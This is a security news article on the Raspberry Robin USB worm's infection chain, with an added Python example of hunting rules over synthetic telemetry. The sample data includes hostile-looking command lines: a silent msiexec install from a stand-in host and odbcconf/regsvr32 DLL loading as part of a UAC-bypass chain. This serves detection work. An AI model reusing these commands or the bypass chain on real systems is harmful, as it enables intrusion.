Cybersecurity researchers have discovered a new Windows malware with worm-like capabilities that propagates by means of removable USB devices.
Attributing the malware to a cluster named "Raspberry Robin," Red Canary researchers noted that the worm "leverages Windows Installer to reach out to QNAP-associated domains and download a malicious DLL."
The earliest signs of the activity are said to date back to September 2021, with infections observed in organizations with ties to the technology and manufacturing sectors.
Attack chains involving Raspberry Robin start with connecting an infected USB drive to a Windows machine. Present on the device is the worm payload, which appears as a .LNK shortcut file pointing to a legitimate folder.
The worm then takes care of spawning a new process using cmd.exe to read and execute a malicious file stored on the external drive.
This is followed by launching explorer.exe and msiexec.exe, the latter of which is used for external network communication to a rogue domain for command-and-control (C2) purposes and to download and install a DLL library file.
The malicious DLL is subsequently loaded and executed using a chain of legitimate Windows utilities such as fodhelper.exe, rundll32.exe to rundll32.exe, and odbcconf.exe, effectively bypassing User Account Control (UAC).
Also common across Raspberry Robin detections is the presence of outbound C2 contact involving the processes regsvr32.exe, rundll32.exe, and dllhost.exe to IP addresses associated with Tor nodes.
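The behaviours described above (cmd.exe executing content from a removable drive, msiexec.exe talking to an external host, an odbcconf.exe whose ancestry runs through fodhelper.exe and rundll32.exe, and regsvr32.exe/rundll32.exe/dllhost.exe reaching Tor node addresses) translate directly into hunting rules over process and network telemetry. The following is an added example written for this page, not Red Canary's or The Hacker News' code: the event records, the removable drive letters, the Tor node list (TEST-NET addresses) and the domain names are all constructed for illustration and are not indicators from the article.

```python
"""Toy hunting rules for the Raspberry Robin behaviours described above.

Added example; all telemetry, drive letters, IPs and domains are constructed.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str      # lower-case image name, e.g. "rundll32.exe"
    cmdline: str


@dataclass(frozen=True)
class NetEvent:
    pid: int
    image: str
    dest: str       # destination host name or IP address


# Assumptions (constructed for this example): drive letters the host reports as
# removable, and a Tor node list as a defender would pull from a threat-intel feed.
REMOVABLE_DRIVE_RE = re.compile(r"(?<![a-z])[ef]:\\")
TOR_NODE_IPS = {"203.0.113.7", "198.51.100.22"}   # TEST-NET addresses, not real nodes
C2_PROCESSES = {"regsvr32.exe", "rundll32.exe", "dllhost.exe"}


def ancestry(pid, procs):
    """Return image names from the given process up to the root of its tree."""
    by_pid = {p.pid: p for p in procs}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(by_pid[pid].image)
        pid = by_pid[pid].ppid
    return chain


def detect(procs, nets):
    """Apply the four rules and return (rule, pid, ...) tuples for each hit."""
    alerts = []
    # Rule 1: cmd.exe whose command line references a file on a removable drive.
    for p in procs:
        if p.image == "cmd.exe" and REMOVABLE_DRIVE_RE.search(p.cmdline.lower()):
            alerts.append(("cmd_from_removable", p.pid))
    # Rule 2: msiexec.exe making any outbound connection (it fetches the DLL).
    for n in nets:
        if n.image == "msiexec.exe":
            alerts.append(("msiexec_outbound", n.pid, n.dest))
    # Rule 3: odbcconf.exe with fodhelper.exe and rundll32.exe above it (UAC bypass chain).
    for p in procs:
        if p.image == "odbcconf.exe":
            chain = ancestry(p.pid, procs)
            if "fodhelper.exe" in chain and "rundll32.exe" in chain:
                alerts.append(("lolbin_uac_chain", p.pid))
    # Rule 4: the named C2 processes connecting to known Tor node addresses.
    for n in nets:
        if n.image in C2_PROCESSES and n.dest in TOR_NODE_IPS:
            alerts.append(("tor_c2", n.pid, n.dest))
    return alerts


# Constructed sample telemetry: one infected-host session plus benign noise.
SAMPLE_PROCS = [
    ProcEvent(4, 0, "system", ""),
    ProcEvent(100, 4, "explorer.exe", "explorer.exe"),
    ProcEvent(101, 100, "cmd.exe", 'cmd.exe /c "E:\\photos\\lib.dat"'),
    ProcEvent(102, 101, "msiexec.exe", "msiexec.exe /q /i http://updates.example.invalid/pkg.msi"),
    ProcEvent(103, 100, "fodhelper.exe", "fodhelper.exe"),
    ProcEvent(104, 103, "rundll32.exe", "rundll32.exe shell32.dll,Control_RunDLL"),
    ProcEvent(105, 104, "odbcconf.exe", "odbcconf.exe /a {REGSVR C:\\Users\\Public\\x.dll}"),
    ProcEvent(106, 100, "regsvr32.exe", "regsvr32.exe /s C:\\Users\\Public\\x.dll"),
    ProcEvent(107, 100, "cmd.exe", "cmd.exe /c dir C:\\Users"),          # benign
]
SAMPLE_NETS = [
    NetEvent(102, "msiexec.exe", "updates.example.invalid"),
    NetEvent(106, "regsvr32.exe", "203.0.113.7"),
    NetEvent(200, "chrome.exe", "203.0.113.7"),   # browser to same IP: not flagged
]


def run_sample():
    return detect(SAMPLE_PROCS, SAMPLE_NETS)


if __name__ == "__main__":
    for alert in run_sample():
        print(alert)
```

Each rule on its own is noisy (msiexec.exe does legitimately reach the network, and rundll32.exe is everywhere); the value is in correlating them on one host within a short window, which is how the article's description of the full chain would be turned into a high-confidence detection.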
That said, the operators' goals remain unanswered at this stage. It is also unclear how and where the external drives are infected, although it is suspected that this is carried out offline.
"We also don't know why Raspberry Robin installs a malicious DLL," the researchers said. "One hypothesis is that it may be an attempt to establish persistence on an infected system."
Some parts of this article are sourced from:
thehackernews.com